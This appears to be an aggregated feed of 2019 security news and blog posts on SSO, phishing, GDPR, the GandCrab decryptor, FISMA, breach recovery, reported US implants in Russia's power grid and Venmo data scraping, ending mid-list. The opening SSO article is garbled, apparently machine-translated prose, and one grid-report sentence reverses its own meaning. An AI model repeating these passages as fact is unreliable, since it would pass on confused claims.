SSO- How It Improves Cybersecurity and User Experience

The launch of the Single Signing Project (SSO) in an organization is often associated with user dissatisfaction with current IT systems and the need to remember several user IDs and passwords to access daily applications.

In the absence of an application that is designed to store credentials and passwords and automatically enter them for users, many users tend to ignore security policies. They choose weak passwords (multiple characters, simple, predictable), or share with their trusted colleagues outside the office.

A good SSO serves all needs: users benefit from simple and fast authentication of all authorized applications and can implement a comprehensive security policy that covers all IT systems. SSO strengthens authentication and allows tracking of all controlled applications. In addition, CFOs can significantly reduce the cost of managing and updating user passwords.

How to start a session (SSO) increases the security of the computer

SSO is becoming the best practice in IT security. It reduces the cognitive burden of IT admins and allow them to concentrate on IT management, and improve operational workflows. As a part of cybersecurity strategies – SSO is a strategic investment in the IT security of organizations, and the reason why is as follows:

SSO increases security by replacing conventional passwords

Passwords are the main cause of most computer security breaches because they can be lost, shared, stolen, or easily forgotten. When a user password is filtered, the boundary of the entire company can be fully opened. Companies can effectively block their human perimeter and dispose of most of their employee keys with SSO solutions. By changing passwords with safer, faster, and stronger user authentication methods, such as quick badge support, SSO can significantly improve corporate cyber security efforts by eliminating many of the weaknesses of old passwords.

SSO improves safety by reducing cognitive stress

Passwords require that users continue to share their attention between their computer systems and their daily activities. By forcing users to perform multiple tasks by writing long alphanumeric strings in the dialog box, passwords increase employee cognitive load. This cognitive tension forces professionals to improvise unsecured password solutions to reduce their frustration. Such solutions include writing passwords on papers, using general credentials, or sharing accounts. Although this type of solution is easier to use and does not frustrate users, it is a nightmare for IT security. Single-entry system (SSO) and the elimination of cognitive stress, allow users to quickly and easily access their sessions without having to write long and complicated passwords multiple times.

SSO increases security by reducing hacking

No matter how clever a user is, they can easily be manipulated to reveal their passwords to hackers through clever hacking tactics. The techniques of phishing, are so sophisticated that even the most experienced users can succumb to them. Users, tired of changing passwords, retrieving them and often entering complex passwords, are naturally immune to password requirements. If a hacker offers a fake dialog box, a fake password reset email, at least one user falls into the trap of hackers. By replacing manual passwords with a secure and centralized single sign-on system, users are automatically protected from the most sophisticated password-poaching method.

SSO improves security by freeing IT resources

An SSO solution is exponentially easier to manage than a password-heavy IT system. In the absence of user passwords, which are frequently changed, lost, or forgotten, IT departments are no longer bogged down with mundane password reset calls and related maintenance requests. With SSO, IT departments can refocus their time and energy on more strategic security initiatives while their SSO solution centralizes password resets and handles all the necessary reporting and auditing features.

An effective SSO solution improves an organization’s security efforts by eradicating the security problems: the password. By replacing passwords, SSO reduces users’ loads, improves workflows, protects organizations from security breaches, and frees IT resources to work on more strategic security projects. For each of these reasons, implementing an SSO solution is a sound cybersecurity decision for businesses.


The post SSO- How It Improves Cybersecurity and User Experience appeared first on .

Why phishing education has never been more critical to your business

Our cyber defenses are becoming stronger and stronger every year. Even the smallest companies can now deploy advanced anti-malware and intrusion detections tools that were, until recently, only within the reach of larger enterprises. Today, sandboxed behavior detection and machine-learning/artificial intelligence powered security services make it easy for organizations of any size to crack down on even the most sophisticated malware. Users are still the weakest link But as our network perimeter and endpoint security … More

The post Why phishing education has never been more critical to your business appeared first on Help Net Security.

One year of GDPR application: Europeans well aware of their digital rights

Europeans are relatively well aware of the new data protection rules, their rights and the existence of national data protection authorities, to whom they can turn for help when their rights are violated, according to the European Commission. “European citizens have become more aware of their digital rights and this is encouraging news. However, only three in ten Europeans have heard of all their new data rights. For companies, their customers’ trust is hard currency … More

The post One year of GDPR application: Europeans well aware of their digital rights appeared first on Help Net Security.

Researchers develop app to detect Twitter bots in any language

Thanks to fruitful collaboration between language scholars and machine learning specialists, a new application that can detect Twitter bots independent of the language used was developed by researchers at the University of Eastern Finland and Linnaeus University in Sweden. In recent years, big data from various social media applications have turned the web into a user-generated repository of information in ever-increasing number of areas. Because of the relatively easy access to tweets and their metadata, … More

The post Researchers develop app to detect Twitter bots in any language appeared first on Help Net Security.

CEO Fraud

CEO Fraud / BEC is a type of targeted attack. It commonly involves a cyber criminally pretending to be your boss, then tricking or fooling you into sending the criminal highly sensitive information or initiating a wire transfer. Be highly suspicious of any emails demanding immediate action and/or asking you to bypass any security procedures.

How employees and their organizations are prioritizing data privacy

Employees in the UK expressed greater understanding of privacy laws, and better training opportunities, than those in the U.S., the ObserveIT survey reveals. The survey polled 1,000 full-time employees in the United States and United Kingdom to determine their understanding of their organizations’ current privacy regulations. New policies and regulations dictating organizations’ handling of sensitive consumer information – such as the GDPR, the CCPA and Vermont’s data privacy law – have brought to light the … More

The post How employees and their organizations are prioritizing data privacy appeared first on Help Net Security.

Economic cycles and disruption are where top CFOs set their firms apart from the competition

Conflicting signals on the economy and related uncertainty should be looked upon by CFOs as an opportunity to accelerate growth and innovation strategies, according to Gartner. Gartner experts highlighted the key differences between firms that use uncertainty to accelerate business performance and those that stall, and the specific behaviors of CFOs that allow their firms to accelerate during times of economic and industry uncertainty. “Far from being something to dread, changing economic cycles and disruption … More

The post Economic cycles and disruption are where top CFOs set their firms apart from the competition appeared first on Help Net Security.

To Air-Gap or Not Air-Gap Industrial Control Networks

What is air-gapping, and why do we air-gap networks? What camp are you in? In the camp that believes in air-gaps, or the other set that says they truly do not exist? Air-gap networks are networks that are physically and logically isolated from other networks where communication between these networks is not physically or logically […]… Read More

The post To Air-Gap or Not Air-Gap Industrial Control Networks appeared first on The State of Security.

Arctic Wolf Managed Risk solution provides proactive vulnerability management services

Arctic Wolf Networks, a leading security operations center (SOC)-as-a-service company, announced the Arctic Wolf Managed Risk solution to provide proactive identification, analysis, and prevention of vulnerabilities. “Companies know that they need to reduce their attack surface, but they often don’t know where to begin. Arctic Wolf Managed Risk service helps companies make sense of their cyber risk profile, by continuously scanning internal/external networks and endpoints, and quantifying cyber risk-based vulnerabilities,” said Brian NeSmith, CEO and … More

The post Arctic Wolf Managed Risk solution provides proactive vulnerability management services appeared first on Help Net Security.

Keyfactor and Thales launch Keyfactor Code Assure, providing secure code signing

Keyfactor, a leading provider of secure digital identity management solutions, announced a new integration with Thales that combines Keyfactor’s code signing platform with the high-assurance key protection of Thales’ SafeNet Cloud HSM On-Demand. The result of this partnership, Keyfactor Code Assure, delivers secure code signing to software vendors, mobile app developers, enterprise IT organizations, and manufacturers of IoT devices. “We’re seeing a rise in threats against code signing operations, like the recent ASUS hack where … More

The post Keyfactor and Thales launch Keyfactor Code Assure, providing secure code signing appeared first on Help Net Security.

CipherCloud adds new email security capabilities in its CipherCloud Zero Trust CASB+ platform

CipherCloud, a leader in cloud security, announced new email security capabilities in its CipherCloud Zero Trust CASB+ platform, combining zero trust threat prevention with industry leading data protection technologies. In addition to the new email security, the CipherCloud platform provides innovative adaptive control enforcing zero trust cloud security with continuous risk assessment; zero-day threat protection and real-time blocking; and machine learning that detects compromised credentials and anomalous behaviors across cloud applications. The platform seamlessly extends … More

The post CipherCloud adds new email security capabilities in its CipherCloud Zero Trust CASB+ platform appeared first on Help Net Security.

WekaIO updates its software platform security for mixed enterprise workloads

WekaIO, the leader in high-performance, scalable file storage for data intensive applications, announced updates to its software platform with advanced security functionality for multi-use enterprise high performance computing (HPC). WekaIO has built the industry’s first flash-native parallel file system that delivers unmatched performance to the most demanding applications, scaling to exabytes of data in a single namespace. Multitenancy allows enterprises to drive business profits by leveraging data across many different applications and groups and accelerating … More

The post WekaIO updates its software platform security for mixed enterprise workloads appeared first on Help Net Security.

CrowdStrike and Inflow Technologies to distribute CrowdStrike Falcon platform to APJ region

CrowdStrike, a leader in cloud-delivered endpoint protection, announced Inflow Technologies as a distributor in India and the South Asian portions of Asia-Pacific and Japan (APJ). Through this partnership, Inflow Technologies will deliver the CrowdStrike Falcon platform to regional customers looking for comprehensive endpoint protection. The CrowdStrike Falcon platform, powered by AI, continues to set the standard in endpoint protection by unifying next-generation antivirus (NGAV), IT hygiene, endpoint detection and response (EDR), cyber threat intelligence, and … More

The post CrowdStrike and Inflow Technologies to distribute CrowdStrike Falcon platform to APJ region appeared first on Help Net Security.

Deepfake LinkedIn Profile Shows Espionage Threat

A deepfake account with possible connections to foreign espionage activity has been identified on LinkedIn.

“Katie Jones” purported to be a senior researcher for the Center for Strategic and International Studies (CSIS). Her well-connected profile on the professional social media site seemed legitimate, with connections that included a deputy assistant secretary of state and economist Paul Winfree, currently being considered for a seat on the Federal Reserve.

An investigation conducted by the Associated Press found that Jones doesn’t exist, and that her profile photo–depicting an attractive woman in her 30s–was a deepfake created using generative adversarial networks, or GANs, AI-driven software that can produce believable images of fictitious people.

“For a while now people have been worrying about the threat of ‘deepfakes’, AI-generated personas that are indistinguishable, or almost indistinguishable, from real live humans,” tweeted AP reporter Raphael Satter, who first reported on the story.

“I conducted about 40 interviews, speaking to all but a dozen of Katie’s connections. Overwhelmingly, her connections told me they accepted whoever asked to their network,” Satter wrote in another tweet.

LinkedIn has been called a “spy’s playground” in reference to the site’s functionality, which makes rote the acceptance of connections from strangers with the suggestion that doing do might benefit their own careers. The German spy agency Bundesamt für Verfassungsschutz (BfV) warned of the potential danger of the platform and how “[i]nformation about habits, hobbies and even political interests can be generated with only a few clicks.”

“Instead of dispatching spies to some parking garage in the U.S to recruit a target, it’s more efficient to sit behind a computer in Shanghai and send out friend requests to 30,000 targets,” said William Evanina, director of the U.S. National Counterintelligence and Security Center.

Digital imaging experts warn LinkedIn users to look for telltale signs of GAN-generated profiles, such as those in the below photo. Several more examples can be found on the website, which randomly generates GAN photos.

AP Deepfake photo
Source: AP Photo

Read the original AP report here.

The post Deepfake LinkedIn Profile Shows Espionage Threat appeared first on Adam Levin.

Trend Micro partners with VIVOTEK to enhance IP cameras security

Trend Micro, a global leader in cybersecurity solutions, announced it has blocked 5 million attempted cyberattacks against IP cameras in just five months. Through its strategic partnership with VIVOTEK, a global leading IP security solution provider, Trend Micro’s IoT security solutions are embedded in globally deployed IP cameras to provide superior protection. By analyzing data from 7,000 anonymously aggregated IP cameras, Trend Micro found that the IP-based surveillance industry is fighting massive cyberattacks, but few … More

The post Trend Micro partners with VIVOTEK to enhance IP cameras security appeared first on Help Net Security.

Cyber Attack Not Ruled-out For 5-Nation Power Outage

Paraguay, Chile, Brazil, Uruguay, and Argentina are having country-wide power outages since June 16, 2019, 7:07 am Argentina time. Labeled by Argentinian authorities as a failure of the power grids that trips one after another, which grew to be 5-country large. Argentinian President, Mauricio Marci went to Twitter to issue a statement that the cause is still unknown.“This morning, a fault in the coastal transmission system caused a power outage in the entire country, whose cause we cannot yet determine precisely. This is an unprecedented case that will be thoroughly investigated,” explained Marci.

His energy secretary, Gustavo Lopetegui made a short but curious comment regarding the incident. “This is an extraordinary event that should never have happened. It’s very serious. We can’t leave the country without power from one moment to another. At this moment we do not rule out any possibilities but … a cyberattack is not within the preliminary alternatives being considered,” said Lopetegui. As of this writing, Edenor, and Edesur, the two top electricity providers in Argentina are hard at work to fully restore power for the whole country. A huge chunk of the power comes from Yacyretá Dam, bordering with Paraguay, the dam generates the majority of the power requirements of Argentina.

“A massive failure in the electrical interconnection system left all of Argentina and Uruguay without power. This is the first time something like this has happened across the entire country,” emphasized Alejandra Martinez, Edesur’s spokeswoman.

University of Buenos Aires Professor, Raul Bertero claimed that the power grid has design and systemic operation errors, which made the power outage more severe than expected. “A localized failure like the one that occurred should be isolated by the same system. The problem is known and there is technology and studies that [work to] avoid it,” said Bertero.

“It is important to clarify that this total disconnection happens automatically. It’s the computers that run the system that does it when they detect imbalances that could cause major harm, and in milliseconds the system disconnects in order to protect itself. There was no alert here. There was no possibility for an alert here because it’s something that a human can’t detect. There is no human intervention,” added Lopetegui.

Argentina’s power grid is linked with Uruguay, Paraguay, Chile and a portion of Brazil, all of them experience power outages all at the same time. Edesur denied that Paraguay and Uruguay experienced country-wide power outages, but only a small percentage of its population without electricity. The heavily affected areas of the outage are Mendoza, Cordoba, La Rioja, Chubut, San Luis, Formosa and Santa Fe in Argentina. Paraguay reported that part of its Villalbin, Ayolas, Misiones, Neembucu and Pilar provinces had experienced the outage as well.

“Everything came to a halt. Elevators, water pumps, everything. We have left adrift. There are some elderly people on the eighth floor but nothing happened, because the power cut was short. If it had gone on for longer it would have been a whole different story,” told Juan Borges, one of the residents in Buenos Aires.

The post Cyber Attack Not Ruled-out For 5-Nation Power Outage appeared first on .

A free Decryptor tool for GandCrab Ransomware released

Good news for the victims of the latest variants of the GandCrab ransomware, NoMoreRansomware released a free decryption tool.

Victims of the latest variants of the GandCrab ransomware can now decrypt their files for free using a free decryptor tool released on the the NoMoreRansom website. The tool works with versions 5 to 5.2 of the ransomware, as well as versions 1 and 4. 

“On 17 June, a new decryption tool for the latest version of the most prolific ransomware family GandCrab has been released free of charge on” reads the press release published by the Eurpol. “This tool allows victims of ransomware to regain access to their information encrypted by hackers, without having to pay demanded ransoms.”

The GandCrab decryptor tool is the result of a partnership with law enforcement agencies from Austria (Bundeskriminalambt – BMI), Belgium (Federal Computer Crime Unit), Bulgaria (General Directorate Combating Organized Crime – Cybercrime Department), France (Police Judiciaire de Paris – Befti), Germany (LKA Baden-Württemberg), the Netherlands (High Tech Crime Unit), Romania (DIICOT), the United Kingdom (NCA and Metropolitan Police), the United States (FBI) and Europol and its Joint Cybercrime Action Taskforce (J-CAT), together with the private partner Bitdefender.

The ransomware appeared in the threat landscape early 2018 when experts at cyber security firm LMNTRIX discovered a new ransomware-as-a-service dubbed GandCrab. The RaaS was advertised in Russian hacking community on the dark web, researchers noticed that authors leverage the RIG and GrandSoft exploit kits to distribute the malware.

In more than one year its operators released several versions with numerous enhancements, but in June they announced they are shutting down their operation and affiliates are being told to stop distributing the ransomware.

GandCrab ransomware V4

In October 2018, experts at the Cybaze Z-Lab have analyzed one of the latest iterations of the infamous GandCrab ransomware, the version 5.0.

The operators revealed they have generated more than $2 billion in ransom payments, earning on average of $2.5 million dollars per week. The operators also declared to have earned a net of $150 million that now have invested in legal activities.

Experts at BitDefender pointed out that not all victims are treated equally:

“GandCrab prioritizes ransomed information and sets individual pricing by type of victim.” read a blog post published by BitDefender. “An average computer costs from $600 and $2,000 to decrypt, and a server decryption costs $10,000 and more. While helping victims with decryption, we’ve seen ransom notes asking for as much as $700,000, which is quite a price for one wrong click,”

According to the Europol, previously released tools for the GandCrab ransomware have helped more than 30 000 victims recover their data for free and save roughly $50 million in unpaid ransoms. 

The joint efforts have also weakened the operators’ position on the cyber crime market and have led to the demise and shutdown of the operation by authorities. Bitdefender and McAfee experts provided a significant contribution to the fight against this threat. 

You can download the GandGrab decryption tool for free at the following address:

Pierluigi Paganini

(SecurityAffairs – ransomare, decryptor tools)

The post A free Decryptor tool for GandCrab Ransomware released appeared first on Security Affairs.

What Is FISMA Compliance?

In today’s digital world, information is the most important asset of many companies. This forms much of their business decisions and potential to earn money. This is also why others try to target corporate data. To counter this, FISMA compliance was created.

What is FISMA compliance?

FISMA is an abbreviation of the Federal Information Security Management Act. It is a United States federal law from 2002 that created a requirement for federal agencies to develop and implement an information security program. FISMA compliance is actually part of a larger act called the E-Government Act of 2002, which seeks to improve overall electronic services and processes.

All in all, FISMA is among the most important regulations when it comes to federal data security standards. It was established to reduce threats against federal data and information while managing the spending on federal information security. To attain its goals and purpose, FISMA created a set of guidelines that government agencies must adhere to. This scope was later increased to include state agencies that administer federal programs such as Medicare. FISMA compliance is also applicable to any private business that has a contractual relationship with the government.

The Office of Management and Budget, or OMB, released a new set of guidelines in April 2010 that now requires federal agencies to provide real-time data to FISMA auditors for continuous monitoring of FISMA information systems.

What Are FISMA Compliance Requirements?

In January 2003, the FISMA Implementation project was launched, and the National Institute of Standards and Technology, or NIST, played a huge role in this. They created the basic concept and standards required by FISMA. This has included several publications, including FIPS 199, FIPS 200, and NIST 800 series.

The top FISMA compliance requirements are:

  • Information System Inventory

Every federal agency and contractor that works with the government is required to keep an inventory of all systems and assets used within the organization. They should also identify integrations of these systems, as well as any others that might be in their network.

  • Security Controls

In NIST SP 800-53, it provides an extensive list of suggested security controls for FISMA compliance. Agencies and contractors don’t need to implement all these security controls; however, they are required to implement those that are relevant to their organization and network. Once done, this must be documented in their security plan.

  • System Security Plan

FISMA compliance states that agencies need to create a security plan that would be maintained and updated regularly. This plan must also be kept up to date. It should cover security controls, along with security policies and a timetable on scaling other controls.

  • Risk Assessments

A key part of FISMA compliance is assessing the risks of an agency’s information security. They can refer to NIST SP 800-30 for guidance on how to properly conduct risk assessment. It should be three-tiered in order to identify security risks from an organizational level to a business process level and finally, to an information system level.

  • Certifications and Accreditation

For FISMA compliance, agency heads and program officials need to conduct annual security reviews so they are able to minimize security threats. FISMA Certification and Accreditation can be achieved by agencies through a four-phased process: planning, certification, accreditation, and monitoring.

FISMA Compliance Benefits

The implementation of FISMA has increased the overall security for federal information. With continuous monitoring, agencies could maintain a high level of security and minimize, if not outright eliminate, vulnerabilities in an efficient manner.

Companies that operate in the private sector, especially those that deal with federal agencies, can greatly benefit from FISMA compliance, as it gives them an edge in acquiring new business from other federal agencies.

What Are the Penalties for Non-compliance of FISMA Requirements?

There is a range of potential penalties for both federal agencies and private companies that do not adhere to FISMA compliance regulations, which includes reduction of federal budget, censure by Congress, and of course, damage to their reputation.

Best Practices for FISMA Compliance

Obtaining FISMA compliance should not be difficult. Here are best practices to help an organization meet the requirements set forth by FISMA. It may not be exhaustive, but it will help in attaining the goal of compliance.

  • Automatically encrypt all sensitive data: It is ideal to have this as a norm and even supply your team with a tool to encrypt data based on classification level or when it is put at risk.
  • Classify information: When creating data, they should be classified based on sensitivity immediately. This helps in prioritizing when to implement security controls.
  • Document written evidence of FISMA Compliance: As updates occur, make sure to document all changes done, in order to adhere to FISMA regulations.

The post What Is FISMA Compliance? appeared first on .

Upcoming Webinar: GDPR Compliance: Convince Customers, Partners, and The Board You Are Compliant!

TrustArc is proud to present the next Privacy Insight Series webinar “GDPR Compliance: Convince Customers, Partners, and The Board You Are Compliant!” with TrustArc General Counsel & Chief Data Governance Officer Hilary Wandall and Centre for Information Policy Leadership at Hunton & Williams LLP President Bojana Bellamy. This webinar will take place on Wednesday, June 19th at 9am PT / 12pm ET / 5pm GMT. Don’t miss this opportunity to learn more about GDPR compliance – register today! Many companies have invested significant time and resources trying to design and implement GDPR compliance programs. Internally, they may have generated hundreds … Continue reading Upcoming Webinar: GDPR Compliance: Convince Customers, Partners, and The Board You Are Compliant!

The post Upcoming Webinar: GDPR Compliance: Convince Customers, Partners, and The Board You Are Compliant! appeared first on TrustArc Blog.

How to recover from a security breach

Experts estimate that ransomware attacks are up over 600 percent. For most companies, the issue isn’t if a cyberattack is going to happen, but when. Some security experts advise that the best way to recover from a security breach is to plan for it before it happens.

Today we take you through:

  • Strategies for building a plan for a cybersecurity attack.
  • Four tips for sharing information with your customers.
  • How to mitigate or prevent cyber incidents.

Strategies for building a plan for a cybersecurity attack

It’s natural to focus on technology and systems during a cyberattack, but it’s just as important to understand how your business is going to respond to the event—internally, to your customers, and to the general public. How do you escalate information and to whom? You often need to integrate input from communications, operations, IT, finance, and other departments. That’s why creating a plan is so important. You want to make sure you can respond quickly and have the right outcomes for your business priorities.

You also need to identify the impact on your systems. Understanding the technology impact during a breach often involves coming up with an internal security operations center (SOC) process flow, decision trees, and a communications escalation process that identifies when you get information, who is told about it, when are they told, and what they need do about it. We often place information into different categories to give us the opportunity to identify information and the business the chance to think things through and build the plan before there’s an actual incident.

Four tips for sharing information with your customers

Companies that contain a security breach in less than 30 days can save millions of dollars. That’s an incentive. But the impact of a breach is more than just financial—it impacts your reputation.

Here are four tips for responding to customers in an efficient, thoughtful way that can mitigate the damage of the attack:

  1. Deliver the right message to your customers after a breach—quickly. Companies used to have the luxury to wait and let the investigation play out before updating the public. Now there is the expectation that if a company has information, it’s doing a disservice to its customers by withholding it.
  2. Be simple and clear. This is where working with your communications team is essential. Practice your communications and response plan before it happens to learn how to improve.
  3. Be cautious. Being transparent and clear doesn’t mean that you have to say absolutely everything about the investigation. In technology, investigations can lead to additional discoveries. Make it clear that the investigation is ongoing and provide updates as the story unfolds. Don’t say anything that you wouldn’t stake your job on, because you might have to.
  4. Divulge any information that could benefit customers who have been affected by the breach and think beyond your business. In 2018, Under Armour reported that their fitness and nutrition app, MyFitnessPal, was hacked. Email and hashed passwords were stolen—affecting 150 million users. Under Armour advised customers to change the password for their app and anywhere it was used. That action demonstrated to customers that the company thought about the impact of the breach beyond their product.

Increasingly companies are expected to think about their customers beyond their specific relationship and consider how a data compromise impacts a customer’s relationship with other companies and accounts.

How to mitigate or prevent cyber incidents

The modern threat landscape is growing in sophistication and volume. As everything is becoming more digitized, there are more ways for bad actors to harm your company.

Here are some best practices that you can use to monitor your environment and combat threats:

Visibility is a key component to effective cybersecurity and monitoring. This includes having a good SOC and visibility into mobile users, remote workers, and business partners. The more you know about what’s happening on your network, including the cloud, the more effectively you can safeguard your environment.

Cyber hygiene and up-to-date security tools are necessities for businesses of all sizes.

  • Even if you’re a small or mid-size company, you can still have good security practices. You can have controls in place, outsource to a company, or work with your provider to get insight into your network. Microsoft Azure automatically gives you access to see what’s happening in your part of the cloud. Azure Security Center enables everybody to see what’s happening in a hybrid cloud environment. You don’t have to have a big cyber defense center to build good security practices.
  • Security solutions, such as Microsoft Threat Protection, provide multiple layers of threat protection across data, applications, devices, and identities and can help protect your company from advanced cyber threats. The security services in Microsoft Threat Protection, enriched by 6.5 trillion daily signals from the Microsoft Intelligent Security Graph, work together to mitigate today’s threats.

Get started

For more detail on actionable tips from security experts on how to recover after a data breach, watch the video, How to recover from a security breach.

The post How to recover from a security breach appeared first on Microsoft Security.

NYT: US Targets Russian Power Grid

NYT: US Targets Russian Power Grid

After news broke that the US has ramped up its digital attacks on Russia, according to a New York Times article, President Trump tweeted that the story was a "virtual act of treason by a once great paper...ALSO, NOT TRUE.”

Though there are no details of the malware that was reportedly placed inside Russia’s power grid system, the NYT reported that National Security Presidential Memoranda 13, a classified document, grants the Department of Defense (DoD) the power to conduct offensive online operations without receiving presidential approval.

Specifically, General Paul Nakasone, commander of the US Cyber Command, holds that authority to make these decisions about offensive strategies. Without confirming that the DoD is taking more aggressive measures, House minority whip Steve Scalise told Meet the Press on June 16, “I'm glad the administration has been taking aggressive actions."

“An offensive cyber-strategy is a necessary component of a larger military and diplomatic strategy against a determined US adversary like Russia. After all, let’s not forget that Russia has been targeting US utilities for several years, at least,” said Carlos Perez, R&D practice lead at TrustedSec.

“US-CERT warned just last year about Russia’s cyber-operations against multiple US utilities. We’ve also seen Russia put these capabilities to real-world effect, as in the case of the two cyber-induced power outages that affected Ukraine. We have to take this threat seriously, and having a cyber-response ready to go is of paramount importance."

Perez clarified that the operations described by the New York Times also do not constitute cyber-war, nor do they exceed the legal restrictions set by our own government.  

"The Department of Defense Law of War Manual has codified cyber operations, which this current action falls within. As you’ll notice, these guidelines include such operational objectives as reconnaissance, acquiring and securing access to key systems, and implanting access tools into infrastructure for the purpose of acquiring foreign intelligence, gaining information about an adversary’s capabilities and gathering information to determine intent, just to name a few.”

While trying to avoid the risk of escalating the situation with Russia, Perez said that this action and others taken by US cyber-ops teams are aimed at preparing the battle space with Russia, so that the US will be ready at some future point, should direct action need to be taken.

“This is also about deterrence, as we are signaling to Russia that we have the technical means and capabilities and the will to use them if we have to. As for the risk of ending up in a full-scale cyber-war, the reality is that we have been close to it with several events that have happened but remained in an economic, intelligence and influence conflict with Russia, as well as other countries, like China, Iran and, to a lesser extent, North Korea. These are low-intensity conflicts but they could escalate at any point, even without us engaging in our own offensive cyber-ops.”

The 2019 Job Seeker & The Cybersecurity Skills Shortage

In today’s ever-changing job market, job seekers and employers alike are under a great deal of pressure. Those looking for their next career move are focusing on what’s required to land a great role with competitive compensation and room for growth in an exciting field. And employers are seeking a rising star that will be a good culture fit and have values that match those of their company.

A Letter to Jobseekers

Whether you just graduated college, left your previous role, or are seeking a different career path, you’re probably thinking, “Now what?” No matter where your path leads you, stay positive. Try to find a company that invests in you, truly wants you to succeed, fosters both personal and professional growth, and makes a big difference in your career progression.

If you’re a problem solver and love to learn, cybersecurity is the path for you. A career in cybersecurity can be very fulfilling. As cybercrime continues to rise, so will the demand for qualified cybersecurity professionals, offering both dynamic growth opportunities and job security. Furthermore, cybersecurity professionals are generally among the most highly-compensated technology workers—and as the need for security professionals further outpaces the supply, salaries will continue to climb as companies compete for top talent Lastly, a career in cybersecurity offers the sense of purpose that comes with making the world a better place by helping protect innocent people from cybercriminals.

Whether you are just out the gate or further along in your career, check out McAfee CHRO Chatelle Lynch’s five powerful career tips: stay hungry, celebrate other’s success, work hard, own your brand, and take pride in everything you do.

Good luck!

A Sustainable Model for Cybersecurity Talent

The term “skills shortage” is all too familiar to those in the cybersecurity industry. A Cybersecurity Ventures report estimates there will be 3.5 million unfilled cybersecurity jobs by 2021. And as cloud platforms demand an increasingly complex set of cloud SecOps skills, the skills gap will continue to grow at an increasing clip.

Success requires fresh thinking and fresh perspectives. It’s time for the cybersecurity industry to redefine the minimum credentials for entry-level cybersecurity jobs and accept non-traditional sources of education. Instead of expecting to hire an experienced cybersecurity professional, more companies should consider accepting job applicants that will require upfront investment and training. According to our Winning the Game report, 92% of cybersecurity managers say gamers possess skills that make them suited to a career in cybersecurity—and 75% would consider hiring a gamer even if that person had no cybersecurity training or experience.

In order to grow security talent and close the skills gap, companies should also consider developing apprenticeship programs, investing and supporting cybersecurity and threat intelligence programs at universities, and other avenues. According to Lynch, “We won’t close our skills gap overnight, but by working together to collectively promote and advocate for a career in cybersecurity, the closer we will get.” We look forward to solving the cyber skills shortage together and driving innovation with diversity and inclusion.

Looking for a career in cybersecurity? Join our team.

The post The 2019 Job Seeker & The Cybersecurity Skills Shortage appeared first on McAfee Blogs.

Episode 516 – Listener Episode – InfoSec Work Life Balance

This episode camne from a listener question about infosec work life balance. I speak about my experience and the landscape of different avenues in cybersecurity and what is on-call, what is not and how to navigate it.  Be aware, be safe. Become A Patron! Pateron Page *** Support the podcast with a cup of coffee […]

The post Episode 516 – Listener Episode – InfoSec Work Life Balance appeared first on Security In Five.

NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid

According to The New York Times, the United States planted destructive malware in Russia’s electric power grid.

The New York Times, citing current and former government officials, revealed that the United States planted a potentially destructive malware in Russia’s electric power grid.

The U.S. cyber army is targeting the Russian power grid since at least 2012 with reconnaissance operations, but recently it also carried out more offensive operations. According to the officials, US cyber soldiers attempted to deploy destructive malware inside the Russian power grid.

“Since at least 2012, current and former officials say, the United States has put reconnaissance probes into the control systems of the Russian electric grid.” states the NYT.

“But now the American strategy has shifted more toward offense, officials say, with the placement of potentially crippling malware inside the Russian system at a depth and with an aggressiveness that had never been tried before.”

Russian power grid

The hacking operations aimed at warning the Russian Government about the cyber capabilities of the U.S. Cyber Command and that could be used as a deterrent to the continuous interference attributed to Russian state-sponsored hackers. It is important to highlight that we have evidence that the malware used by the US Cyber units caused any disruption to the target systems.

President Trump publicly denied the revelation made by the NYT:

The New York Times added that according to two US officials Trump was completely informed about cyber operations conducted by the US Cyber Command. High officials inside the US Cyber Command might have hidden the details of the cyber attacks inside the Russian power grid fearing a possible reaction of the President due to its relationship with President Putin.

“Two administration officials said they believed Mr. Trump had not been briefed in any detail about the steps to place “implants” — software code that can be used for surveillance or attack — inside the Russian grid.” continues the newspaper.

“Pentagon and intelligence officials described broad hesitation to go into detail with Mr. Trump about operations against Russia for concern over his reaction — and the possibility that he might countermand it or discuss it with foreign officials, as he did in 2017when he mentioned a sensitive operation in Syria to the Russian foreign minister.”

In July 2018, the US Department of Homeland Security declared that Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and continue to target them.

“In the past few months, Cyber Command’s resolve has been tested. For the past year, energy companies in the United States and oil and gas operators across North America discovered their networks had been examined by the same Russian hackers who successfully dismantled the safety systems in 2017 at Petro Rabigh, a Saudi petrochemical plant and oil refinery.” concludes the NYT.

“The question now is whether placing the equivalent of land mines in a foreign power network is the right way to deter Russia. While it parallels Cold War nuclear strategy, it also enshrines power grids as a legitimate target.”

Pierluigi Paganini

(SecurityAffairs – Russian power grid, hacking)

The post NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid appeared first on Security Affairs.

Seven Million Venmo Transactions Published on GitHub

Seven Million Venmo Transactions Published on GitHub

Venmo users are being advised to set their accounts to private after a computer science student scraped seven million Venmo transactions, proving that users’ public activity can be easily accessed, according to The Next Web (TNW).

Over a six-month period, Minnesota State University computer science student Dan Salmon, collected a data set, which Salmon exported from MongoDB, of more than seven million Venmo transactions, which he published on GitHub.

“I am releasing this dataset in order to bring attention to Venmo users that all of this data is publicly available for anyone to grab without even an API key. There is some very valuable data here for any attacker conducting OSINT research,” Salmon wrote.

“I would highly encourage all users to switch their Venmo account to private by going to Settings > Privacy and selecting "Private" as well as Past Transactions > Change All to Private. Screenshot instructions are available here.”

"Transparency may often be used against the legitimate interests of end users. Probably very few of us wish to share all their payment transactions with the rest of the world even if we have nothing to hide. Venmo should explicitly and conspicuously notify all its users that their transactions are accessible by everyone unless they update their settings,” said Ilia Kolochenko, founder and CEO of web security company ImmuniWeb.

“[The] developer’s API should be provided only to vetoed, properly verified third parties within a scope of a binding legal agreement capable of protecting users’ privacy regardless of technical flaws one may discover now or in the future,” Kolochenko said.

“Anti-scraping functionality probably requires holistic testing via an open bug bounty program, for example, to spot and remediate as many anti-automation bypasses as possible. This will not provide absolute protection but at least will considerably reduce the efficiency of data-scraping campaigns. Without all these common-sense measures, Venmo may face serious legal ramification and severe monetary penalties in many jurisdictions, let alone disgruntled users and loss of revenue."

In an email to Infosecurity, a Venmo spokesperson said, "Venmo was designed for sharing experiences with your friends in today’s social world, and the newsfeed has always been a big part of this. The safety and privacy of Venmo users and their information is always a top priority. 

"Venmo does a number of things to keep our users informed and help them protect and control their privacy, including:

